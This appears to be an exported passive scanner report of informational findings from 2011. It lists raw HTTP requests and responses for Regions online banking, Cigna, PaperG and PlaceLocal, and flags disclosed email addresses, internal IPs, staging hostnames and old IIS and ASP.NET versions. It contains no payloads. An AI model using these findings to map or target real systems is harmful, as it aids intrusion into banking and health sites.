| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/js/min | 
| GET /mycignatheme/js/min Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/x-javascript date: Mon, 16 May 2011 15:30:26 GMT last-modified: Wed, 20 Apr 2011 17:47:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_e87abf76-4b84 Content-Length: 168592 function progressbar(limit, met, gwidth) { calpercentage = Math.round(met*100/limit) calwidth=Math.round remwidth=Math.round output='<div class="out ...[SNIP]... ll be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /ForgottenPassword.aspx | 
| GET /ForgottenPassword.aspx HTTP/1.1 Host: securebank.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 15873 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /SystemUnavailable.aspx | 
| GET /SystemUnavailable.aspx Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: securebank.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:16 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 4559 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="https://secureb ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAM.js | 
| GET /VAM/2_0_2/VAM.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 37697 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 var gVAM_UA = navigator.userAgent var gVAM_OS, gV ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAML2.js | 
| GET /VAM/2_0_2/VAML2.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 5007 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 function VAM_EvalDiffCond(pCO) { var vVal1 = pCO.ConvVal(pCO, p ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /VAM/2_0_2/VAM_DTTB.js | 
| GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT Accept-Ranges: bytes ETag: "08a854a4d9c61:f627" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT Content-Length: 5948 // Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com // Professional Validation And More v2.0.2 Level 2 function VAM_ReformatInit(pAO) { var vFld = VAM_GetById(pAO.Con ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache Content-Length: 3262 Content-Type: image/x-icon Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT Accept-Ranges: bytes ETag: "e0921d6e811c81:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:22 GMT ...... ..............(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/btnContinue.gif | 
| GET /images/btnContinue.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 1026 Content-Type: image/gif Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT Accept-Ranges: bytes ETag: "03d9adc2454c71:f627" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:09 GMT GIF89aF......U..U.....V.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/equalhousing.gif | 
| GET /images/equalhousing.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 282 Content-Type: image/gif Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT Accept-Ranges: bytes ETag: "0b7b64b4d9c61:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT GIF89a...........//...... ...s.%. .#.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/green/rf_logo.gif | 
| GET /images/green/rf_logo.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 4105 Content-Type: image/gif Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT Accept-Ranges: bytes ETag: "0e6a25879fdc81:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:05 GMT GIF89a).8.......U........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/red_arrow.gif | 
| GET /images/red_arrow.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 54 Content-Type: image/gif Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT Accept-Ranges: bytes ETag: "0a53d764750c71:f627" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:09 GMT GIF89a........U....!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /images/spacer.gif | 
| GET /images/spacer.gif HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Length: 799 Content-Type: image/gif Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT Accept-Ranges: bytes ETag: "0b7b64b4d9c61:e57b" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:06 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /login.aspx | 
| POST /login.aspx?brand=regions HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 Origin: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 110 ignore=&locationZipCode | 
| HTTP/1.1 301 Moved Set-Cookie: securebank.regions.com Date: Mon, 16 May 2011 15:20:12 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: https://securebank Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html Content-Length: 0 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /script/regions.js | 
| GET /script/regions.js HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT Accept-Ranges: bytes ETag: "01c578a6a70cb1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:00 GMT Content-Length: 8556 /************************ * * * Copyright .2005 Corillian Corporation * * ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /styles/styles.AmSouth | 
| GET /styles/styles.AmSouth Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: text/css Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT Accept-Ranges: bytes ETag: "05c773bea85ca1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:00 GMT Content-Length: 25437 BODY {font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;} .pageBackground {background-image:url(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /styles/stylesprint.css | 
| GET /styles/stylesprint.css HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: text/css Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT Accept-Ranges: bytes ETag: "05c773bea85ca1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:01 GMT Content-Length: 32493 BODY {font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;} .pageBackground {background-image:url(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.google.com | 
| Path: | /uds/solutions/slideshow | 
| GET /uds/solutions/slideshow Host: www.google.com Proxy-Connection: keep-alive Referer: http://www.cloudscan.me/p User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=381be2a5a4e321de | 
| HTTP/1.1 200 OK Last-Modified: Thu, 05 May 2011 23:34:29 GMT Content-Type: application/x-javascript Date: Mon, 16 May 2011 14:32:31 GMT Expires: Mon, 16 May 2011 14:32:31 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 35793 /** * Copyright (c) 2008 Google Inc. * * You are free to copy and use this sample. * License can be found here: http://code.google.com */ /** * @fileoverview A slideshow control based on the AJAX Feed API. * @author dcollison@google.com (Derek Collison) */ /** * GFslideshow * @param {String} photoFeed The feed URL. * @param {String|Object} container Either the id string or the element itself. * @param {Object} options Options m ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /post.php | 
| GET /post.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27786045 | 
| HTTP/1.0 200 OK Date: Mon, 16 May 2011 16:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <title>PaperG | Post a Flyer</title> <meta http-equiv="Content-Type" co ...[SNIP]... <span id="msg_email"> ex. young@jtmarlin.com </span> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | /css/ui.all.css | 
| GET /css/ui.all.css HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:15:38 GMT Content-Type: text/css Connection: keep-alive Last-Modified: Mon, 14 Mar 2011 06:31:32 GMT Accept-Ranges: bytes Cache-Control: max-age=604800 Expires: Mon, 23 May 2011 15:15:38 GMT Vary: Accept-Encoding Content-Length: 20792 /* * jQuery UI screen structure and presentation * This CSS file was generated by ThemeRoller, a Filament Group Project for jQuery UI * Author: Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup * Visit ThemeRoller.com */ /* * Note: If your ThemeRoller settings have a font size set in ems, your components will scale according to their parent element's font siz ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | /js/includes/jquery-ui | 
| GET /js/includes/jquery-ui Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:15:40 GMT Content-Type: application/javascript Connection: keep-alive Last-Modified: Tue, 23 Nov 2010 10:19:52 GMT Accept-Ranges: bytes Cache-Control: max-age=604800 Expires: Mon, 23 May 2011 15:15:40 GMT Vary: Accept-Encoding Content-Length: 75355 /* * jQuery UI 1.5.3 * Contains Datepicker * * Copyright (c) 2008 Paul Bakaus (ui.jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * http:// ...[SNIP]... 08 Marc Grabanski * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * http://docs.jquery.com/UI * * Depends: * ui.core.js * * Marc Grabanski (m@marcgrabanski.com) and Keith Wood (kbwood@virginbroadband */ (function($) { // hide the namespace var PROP_NAME = 'datepicker'; /* Date picker manager. Use the singleton instance of this class, $.datepicker, to interact with the date picker. S ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/email | 
| GET /about_regions/email Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:48:51 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 20870 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... <a href="mailto:phishing@regions.com"><strong>phishing@regions.com</strong> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/report | 
| GET /about_regions/report Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:43:40 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 25489 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... <a href="mailto:phishing@regions.com">phishing@regions.com</a> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/online | 
| GET /personal_banking/online Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:18 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 22388 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... <a href="mailto:phishing@regions.com">phishing@regions.com</a> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /js/hplogin.js | 
| GET /js/hplogin.js HTTP/1.1 Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:11 GMT Content-length: 17885 Content-type: application/x-javascript Cache-control: no-cache Etag: "de405e41-1-0-45dd" Last-modified: Wed, 16 Feb 2011 12:26:14 GMT Accept-ranges: bytes Connection: close // Function for retrieving cookie values function getCookie(name) { var dc = document.cookie; var prefix = name + "="; var begin = dc.indexOf("; " + prefix); if (begin == -1) { begin = dc. ...[SNIP]... 4qh45dlnyliqj)/Physician if (domain[0] == ("d-www.cigna.com")) {bni = "http://staging.arvatocim if (domain[0] == ("192.168.204.239")) {bni = "http://staging.arvatocim if (domain[0] == ("qawww.cigna.com")) {bni = "http://staging.arvatocim ...[SNIP]... h45dlnyliqj)/Physician if (domain[0] == ("qawww06.cigna.com")) {bni = "http://staging.arvatocim if (domain[0] == ("192.168.204.231")) {bni = "http://staging.arvatocim if (domain[0] == ("129.33.68.182")) {bni = "http://staging.arvatocim ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Tentative | 
| Host: | http://assets.olark.com | 
| Path: | /a/assets/v0/site/4116 | 
| GET /a/assets/v0/site/4116 Host: assets.olark.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 16:24:22 GMT Content-Type: application/x-javascript Content-Length: 2617 Last-Modified: Mon, 16 May 2011 16:14:40 GMT Connection: close P3P: CP='Olark does not have a P3P policy. Learn why here: http://olark.com/p3p' Accept-Ranges: bytes (function(){ var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout) if(isNewVersion) { olark._.finish ...[SNIP]... nNhbGVzPTEmdXRtX21lZ }else{ olark.configure(function conf.system.site_id="4116 }); olark._.finish(); } })(); | 
| Severity: | Information | 
| Confidence: | Tentative | 
| Host: | http://www.placelocal.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
